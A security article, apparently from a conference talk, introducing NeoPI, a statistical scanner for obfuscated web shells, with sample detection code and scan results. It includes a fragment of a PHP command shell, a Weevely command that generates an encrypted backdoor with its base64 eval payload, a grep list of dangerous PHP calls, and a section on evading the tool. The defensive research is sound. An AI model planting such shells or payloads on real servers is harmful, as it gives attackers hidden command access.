Web Shell Detection Using NeoPI
This article was part of a talk presented at BSidesChicago.
What’s Up With These Pesky Shells?
Web servers have become one of the main targets of malicious activity and are often a weak point within an organization’s infrastructure. Web application code is frequently deployed and then forgotten or left unmaintained, creating weak points that are vulnerable to attack. Web applications are commonly developed in scripting languages such as PHP, Python, Ruby, and Perl. These languages are sophisticated enough that a security issue within a web application can lead to the execution of arbitrary scripting code.
When one of these conditions is identified by an attacker they often seek to persist their access by the deployment of web shell code. This code creates a “virtual” shell accessible via the web server. The shell typically permits system command execution and file access, among other possibly nasty functionality.
Imagine you are hosting a website that you believe may have been compromised. Your shared web server has thousands of PHP pages and an attacker may have planted a backdoor in any one, or more, of them. You have tried scanning the system and checking IDS logs but you think the backdoor may be customized particularly for your environment. As a result, signature based tools are coming up empty. How do you detect and remove this backdoor if current tools such as antivirus and IDS can’t detect it?
The type of backdoor we are discussing is a web shell. A web shell can be defined as an undocumented way to gain console access to a computer system through a dynamic server side web page. Traditionally these web shells were simple and easy to detect. For example, let’s take the following PHP file:
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "
This shell is straightforward and allows an attacker to simply enter a URL such as the fabricated example below to execute commands:
More sophisticated web shells include methods to interact with the console, edit files, etc. The readme file for the C99 shell, a webshell that has been around for almost a decade, states the following feature set:
Visual File Manager (Many Features)
Get all readable home directories
How do we detect unencrypted shells?
Shells such as C99 can be detected by crafting some keyword searches or using a signature based detection tool. We could grep for the following on a web-server in an attempt to locate a PHP backdoor (adapted from Steven Whitney):
grep -RPn "(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|readfile|passthru)" /pathto/webdir/
As one can imagine, this would generate a huge number of false positives, as many of these calls are used by legitimate web applications. We could also try a tool like Linux Malware Detect (LMD). We ran LMD against a web command shell repository of 90 backdoors, and it detected 37 of them. Such a low detection rate isn’t that surprising, as some of these web shells were Windows specific. What was surprising was that LMD failed to detect some of the obfuscated web shells in the repository, such as isko, shellzx, and fatal.
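The keyword search can also be sketched in Python, which makes it easier to count hits per file rather than read raw grep output. This is only an illustration: the keyword list is copied from the grep example, while the names `count_keyword_hits` and `scan_tree` are hypothetical and not part of any tool mentioned here.

```python
import os
import re

# Keyword list copied from the grep example; like grep, it matches substrings.
SUSPICIOUS = re.compile(
    rb"(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir"
    rb"|fopen|fclose|readfile|passthru)"
)


def count_keyword_hits(data):
    """Return {keyword: occurrences} for the raw bytes of one file."""
    hits = {}
    for match in SUSPICIOUS.finditer(data):
        word = match.group(1).decode("ascii")
        hits[word] = hits.get(word, 0) + 1
    return hits


def scan_tree(base_dir):
    """Yield (path, hits) for each readable file under base_dir with a hit."""
    for root, _dirs, files in os.walk(base_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as handle:
                    hits = count_keyword_hits(handle.read())
            except OSError:
                continue  # unreadable file; skip it
            if hits:
                yield path, hits
```

Sorting the results by total hit count gives a rough triage order, but it suffers from the same false positives as the grep approach.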
How do these methods work against custom shells?
We also created a custom web shell. We used the tool Weevely to generate an obfuscated and encrypted backdoor using the following command:
server# python weevely.py -g -o test_shell.php -p qazwsxedc
This generated an encrypted web shell using the password ‘qazwsxedc’:
eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc 2V0KCRhKT09J3FhJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPHp3c3hlZGM+JztldmFsKGJhc2U2NF 9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTM pKSkpKTtlY2hvICc8L3p3c3hlZGM+Jzt9'));
We scanned the directory again with LMD and the test_shell.php was not detected.
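When a file like this is found, it helps to see what the encoded string hides. The sketch below pulls string literals out of `base64_decode('...')` calls and decodes them for inspection. It is a hypothetical helper, not part of LMD, Weevely, or NeoPI, and it assumes the payload is a plain quoted literal; shells that build the string dynamically would not be caught.

```python
import base64
import re

# Matches the quoted argument of base64_decode('...') or base64_decode("...").
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")


def decode_base64_payloads(source):
    """Return the decoded bytes of each base64_decode() literal in source."""
    decoded = []
    for match in B64_CALL.finditer(source):
        # Drop whitespace inside the literal (line wrapping often adds it).
        payload = "".join(match.group(2).split())
        try:
            decoded.append(base64.b64decode(payload, validate=True))
        except ValueError:
            continue  # not valid base64 after all; skip it
    return decoded
```

The decoded bytes should only be read, never executed.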
To circumvent signature based detection, some web shells, like the one generated with Weevely, implement mechanisms specifically aimed at avoiding detection. Customized code is compressed or encrypted to obfuscate it. This is especially effective at thwarting signature based detection systems and keyword searches. In addition, finding such files on enterprise web servers that contain tens of thousands of pages can be extremely difficult due to the sheer volume of data.
How easy is it to deploy a web shell?
Deploying these shells can be facilitated by a number of methods: command injection, file upload vulnerabilities, insecure FTP, and remote file include vulnerabilities. If the attacker can get the web server to execute the backdoor, the attacker gains shell level access to the host operating system, running with the same privileges as the web server.
If we aren’t able to reliably detect web shells with traditional methods such as signature based detection, what options do we have left? Enter NeoPI.
NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text and script files. The intended purpose of NeoPI is to aid in the identification of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
NeoPI is platform independent and can be run on any system with Python 2.6 installed. The user running the script should have read access to all of the files that will be scanned.
NeoPI recursively scans through the file system from a base directory and will rank files based on the results of a number of tests. The ranking helps identify with a higher probability which files may be encrypted web shells. It also presents a “general” score derived from file rankings within the individual tests.
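The text does not spell out how the “general” score is derived, so the following is only a sketch under an assumed scheme: each test ranks the files, and a file’s ranks are summed across tests. The function names and the idea of summing ranks are assumptions for illustration, not NeoPI’s confirmed method.

```python
def rank_files(scores, higher_is_suspicious=True):
    """Return {path: rank}, where rank 0 is the most suspicious file."""
    ordered = sorted(scores, key=scores.get, reverse=higher_is_suspicious)
    return {path: rank for rank, path in enumerate(ordered)}


def general_ranking(test_results):
    """Combine per-test rankings by summing each file's rank across tests.

    test_results is a list of (scores, higher_is_suspicious) tuples, where
    scores maps a file path to that test's raw value.
    """
    totals = {}
    for scores, higher_is_suspicious in test_results:
        ranks = rank_files(scores, higher_is_suspicious)
        for path, rank in ranks.items():
            totals[path] = totals.get(path, 0) + rank
    # The lowest total rank is the most suspicious file overall.
    return sorted(totals, key=totals.get)
```

Working with ranks rather than raw values sidesteps the fact that the tests report numbers on very different scales.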
Analysis Methods Explained
NeoPI uses several different statistical methods to try and determine the likelihood that a file contains obfuscated code.
The longest string test identifies the length of the longest uninterrupted string within a file. This is useful because obfuscated code is often stored as a long string of encoded text within a file. Many popular encoding methods, such as base64 encoding, will produce a long string without space characters. Typical text and script files will be composed of relatively short length words; identifying files with uncharacteristically long strings may help to identify files with obfuscated code.
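import re

def longest_word(data):
    # Split on whitespace; the commas inside the character class also act as separators.
    longest = 0
    words = re.split(r"[\s,\n,\r]", data)
    for word in words:
        if len(word) > longest:
            longest = len(word)
    return longest
The above code splits a string into “words” at space characters, new lines, and carriage returns (and, because of the commas in the character class, at commas as well). It then identifies and returns the length of the longest word.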
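To see why this test separates encoded payloads from ordinary script text, here is a small self-contained sketch in Python 3. The function is a compact variant of the idea, not NeoPI’s exact code, and the sample strings are made up.

```python
import base64
import re


def longest_word(data):
    """Length of the longest run of characters without whitespace or commas."""
    words = re.split(r"[\s,]+", data)
    return max((len(word) for word in words), default=0)


# A plain script and the same script wrapped in a base64 payload.
plain = "<?php echo 'Hello, world'; ?>"
payload = base64.b64encode(plain.encode("ascii") * 10).decode("ascii")
wrapped = "<?php eval(base64_decode('" + payload + "')); ?>"

if __name__ == "__main__":
    print("plain:  ", longest_word(plain))
    print("wrapped:", longest_word(wrapped))
```

The wrapped version contains one very long token because base64 output has no spaces, which is exactly the property the test looks for.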
Entropy is a measure of uncertainty within a value. Shannon entropy quantifies the expected value of the information contained in a message, usually in units such as bits. This test calculates the Shannon entropy of a file, which corresponds to the minimum average number of bits per character required to encode it. This can be thought of as a measure of randomness. Measuring entropy is useful in locating encrypted shell code, because encryption often introduces a large amount of entropy into a text string.
import math
def shannon_entropy(data):
    if not data:
        return 0.0
    entropy = 0.0
    for x in range(256):
        p_x = float(data.count(chr(x))) / len(data)
        if p_x > 0:
            entropy += - p_x * math.log(p_x, 2)
    return entropy
The above code calculates the Shannon entropy of “data” and returns a floating point number between 0 and 8. This value is the byte entropy of “data”: the average number of bits per character required to represent it. A file containing a large degree of randomness or information requires more bits to communicate, and so produces a larger entropy value. Changing the log base from 2 to 256 within this function would return a value between 0 and 1, which may be useful for matching other normalized measures of entropy. The higher the number, the more entropy is present within the data string, indicating a high degree of randomness or variety of information.
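The same calculation can be sketched for Python 3, where file contents are read as bytes. This is an illustrative variant rather than NeoPI’s code; the `base` parameter is an addition that shows how the log base sets the range of the result.

```python
import math
from collections import Counter


def shannon_entropy(data, base=2):
    """Shannon entropy of a bytes object.

    With base=2 the result is in bits per byte (0 to 8); with base=256 the
    result is scaled to the range 0 to 1.
    """
    if not data:
        return 0.0
    total = len(data)
    entropy = 0.0
    for count in Counter(data).values():
        p_x = count / total
        entropy -= p_x * math.log(p_x, base)
    return entropy
```

A single repeated byte yields 0, while data in which all 256 byte values are equally likely reaches the maximum of 8 bits per byte.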
Index of Coincidence
The index of coincidence (I.C.) is a technique used in cryptanalysis and in the natural language analysis of text. It measures how often letters coincide, compared to a text sample in which all letters are equally distributed. This returns a value which is generally consistent for a given type of text, whether a natural language or a scripting language. The value is useful in identifying text files whose I.C. is uncharacteristic for files of a similar type. This may indicate that the file contains portions of text, either encoded or encrypted, that deviate from normal character distributions.
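def index_of_coincidence(data):
    # Sum n * (n - 1) over the count n of each character, then divide by N * (N - 1).
    char_count = 0
    total_char_count = 0
    for x in range(256):
        char = chr(x)
        charcount = data.count(char)
        char_count += charcount * (charcount - 1)
        total_char_count += charcount
    if total_char_count < 2:
        return 0.0
    ic = float(char_count) / (total_char_count * (total_char_count - 1))
    # Call method to calculate_char_count and append to total_char_count
    return ic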
The above code calculates the I.C. for the string “data”. It returns a floating point number.
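A compact Python 3 sketch of the same formula makes the behaviour at the extremes easy to check. It is an illustration rather than NeoPI’s code, and the sample inputs are made up.

```python
from collections import Counter


def index_of_coincidence(data):
    """I.C. of a bytes object: sum of n * (n - 1) divided by N * (N - 1).

    n is the count of each distinct byte value and N is the total length.
    """
    total = len(data)
    if total < 2:
        return 0.0
    numerator = sum(n * (n - 1) for n in Counter(data).values())
    return numerator / (total * (total - 1))


# Text using 26 letters equally often approaches an I.C. of 1/26.
uniform_letters = bytes(range(ord("a"), ord("z") + 1)) * 1000

if __name__ == "__main__":
    print(index_of_coincidence(uniform_letters))
```

Encoded or encrypted content spreads its characters more evenly than ordinary script text, so it tends to pull a file’s I.C. down toward the uniform value for its alphabet.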
Several features are planned for the future development of NeoPI.
- Additional tests and fine tuning of tests based upon the file format may help detect anomalies. An example of this would be to collect an average index of coincidence for each web programming language. The current method builds the average index of coincidence only from the files scanned. One way to create a baseline may be to assemble very large Python code repositories, run the index of coincidence test over them, and store the result. In an example use case, Python files deviating from the expected I.C. range for typical Python files would be flagged.
- Block entropy is another function we would like to add to the statistical analysis. Block entropy would allow us to read in files based on a predefined block size and analyze sub-portions of the text for entropy. This may help detect shells that use a combination of English text and encrypted blocks to avoid detection.
- Multi-threading to speed up file analysis would be beneficial on ultra large web deployments.
Finally, we also plan on adding some basic signature detection scans to provide a secondary mechanism for detecting web shells.
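The block entropy idea can be sketched as follows. Since the feature is described only as planned, everything here is an assumption for illustration: the function names, the fixed non-overlapping blocks, and the default block size of 256 bytes.

```python
import math
from collections import Counter


def shannon_entropy(data):
    """Shannon entropy of a bytes object, in bits per byte."""
    if not data:
        return 0.0
    total = len(data)
    entropy = 0.0
    for count in Counter(data).values():
        p_x = count / total
        entropy -= p_x * math.log2(p_x)
    return entropy


def block_entropies(data, block_size=256):
    """Entropy of each consecutive block_size-byte block (last may be short)."""
    return [
        shannon_entropy(data[start:start + block_size])
        for start in range(0, len(data), block_size)
    ]
```

A file that is mostly plain text but hides one dense blob has a modest whole-file entropy, while the block containing the blob stands out. Overlapping windows might catch blobs that straddle a block boundary, at the cost of more computation.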
How to use it
NeoPI is platform independent and will run on both Linux and Windows. To start using NeoPI, first check out the code from our GitHub repository or from this website.
git clone git@github.com:Neohapsis/NeoPI.git
The small NeoPI script is now in your local directory. We are going to go through a few examples on Linux and then switch over to Windows.
Let’s run neopi.py with the -h flag to see the options.
[sbehrens@WebServer2 opt]$ ./neopi.py -h
Usage: neopi.py [options]
--version show program's version number and exit
-h, --help show this help message and exit
-C FILECSV, --csv=FILECSV
generate CSV outfile
-a, --all Run all tests [Entropy, Longest Word, Compression
-e, --entropy Run entropy Test
-l, --longestword Run longest word test
-c, --ic Run IC test
-A, --auto Run auto file extension tests
Let’s break down the options into greater detail.
-C FILECSV, --csv=FILECSV
This generates a CSV output file containing the results of the scan.
-a, --all
This runs all tests including entropy, longest word, and index of coincidence. In general, we suggest running all tests to build the most comprehensive list of possible web shells.
-e, --entropy
This flag can be set to run only the entropy test.
-l, --longestword
This flag can be set to run only the longest word test.
-c, --ic
This flag can be set to run only the Index of Coincidence test.
-A, --auto
This flag runs an auto generated regular expression that contains many common web application file extensions. This list is by no means comprehensive but does provide a good ‘best effort’ scan if you are unsure of what web application languages your server is running. The current list of extensions is included below:
valid_regex = re.compile(r'\.php|\.asp|\.aspx|\.sh|\.bash|\.zsh|\.csh|\.tsch|\.pl|\.py|\.txt|\.cgi|\.cfm')
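The expression above is not anchored, so if it is applied with `re.search` it can also match names such as `backup.php.bak`. The sketch below shows one way to filter a directory tree with an anchored, case insensitive variant. The names `is_candidate` and `iter_candidate_files` are hypothetical, the extension list is copied verbatim from the article, and this is not how NeoPI itself is confirmed to apply the expression.

```python
import os
import re

# Extension list copied from the article; anchored so only the final
# extension of a filename counts.
VALID_EXTENSION = re.compile(
    r"\.(php|asp|aspx|sh|bash|zsh|csh|tsch|pl|py|txt|cgi|cfm)$",
    re.IGNORECASE,
)


def is_candidate(filename):
    """Return True if the filename ends with one of the listed extensions."""
    return VALID_EXTENSION.search(filename) is not None


def iter_candidate_files(base_dir):
    """Yield the path of every candidate file under base_dir."""
    for root, _dirs, files in os.walk(base_dir):
        for name in files:
            if is_candidate(name):
                yield os.path.join(root, name)
```

Whether to anchor is a trade-off: an anchored pattern scans fewer irrelevant files, but an attacker may deliberately hide code in a file with an unexpected extension.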
Now that we are familiar with the flags and have downloaded a copy of the script from GitHub, let’s go ahead and run it on a web server we think may be infected with obfuscated web shells. To get a feel for how many pages we have, let’s run the following command:
We specified that we are not concerned with many common image types. We can see that this web server has quite a large number of web pages. Let’s say we are pretty confident that the web server only supports PHP pages. Let’s get a count of how many PHP pages we are dealing with:
We can see that the web server hosts close to 4,000 PHP pages. We went ahead and planted four web shells throughout the web directories. These included a fully encrypted web shell, C99, a web shell that contained a mixture of encrypted and plain text, and a shell generated by Weevely. The files were modified to avoid signature based detection systems. This environment is meant to simulate the situation described above, where you believe a malicious web shell may exist within your web root, but signature based malware detection tools can’t seem to locate any malicious files. Let’s go ahead and run NeoPI to see if it can help.
[sbehrens@WebServer2 opt]$ sudo ./neopi.py -C scan1.csv -a -A /var/www/
This is the full output of the scan results. We can see that the average I.C. is displayed at the top of the output. This gives us an average index of coincidence (kappa-plaintext) of .0372. It should be noted that the average index of coincidence is reported without normalizing the denominator. An interesting observation is that the expected coincidence rate for text drawn uniformly from the 26 letters of the English alphabet is 1/26, or about 0.0385. The tool displays the files with the lowest Index of Coincidence first. We see that the Index of Coincidence seems relatively abnormal for shell3.php. We also see that Weevely, shell2.php, and shell.php have made it into the results. We then move down to Entropy, which shows shell3.php, shell2.php, and Weevely. Longest word is very helpful for detecting fully encrypted backdoors such as shell3.php and shell2.php.
We calculate a simple average across all three tests and report it as a percentage of confidence. As we can see in the top 10 highest ranked files, the tool was able to identify shell3.php, weevely.php, and shell.php. The file shell2.php, which is predominantly unencrypted, was flagged by the I.C. and entropy tests but did not make the average list. We highly suggest that you check out all of the files listed in each test, as some tests are more effective at detecting certain shells than others.
The tool is compatible with Windows as well. In the example below, we use a regular expression to search only for PHP and text files.
How to beat it
As with all malware detection, there are steps which can be taken to avoid detection. NeoPI is focused on detecting obfuscated code; in fact it will often perform better in detecting code which is MORE obfuscated. Unobfuscated code is transparent to the tests performed and would blend in perfectly with other code on the system (but would be vulnerable to signature or expression search detection). Code obfuscated in such a way that the obfuscation looks like normal text will likely not be highlighted by NeoPI. One such obfuscation method might encode/decode text into strings composed of valid English words or script language. This encoded string would escape I.C. analysis because the frequency of letters is consistent with genuine code. It would also have an entropy value consistent with genuine code because the word level obfuscation would bias the entropy calculation. Finally, so long as spaces are also implemented within the obfuscation, the code would escape detection by a longest word search.
Here is example code for a simple encoding mechanism that would escape detection by NeoPI. It is loosely based off of the PHP shell listed in the beginning of the article.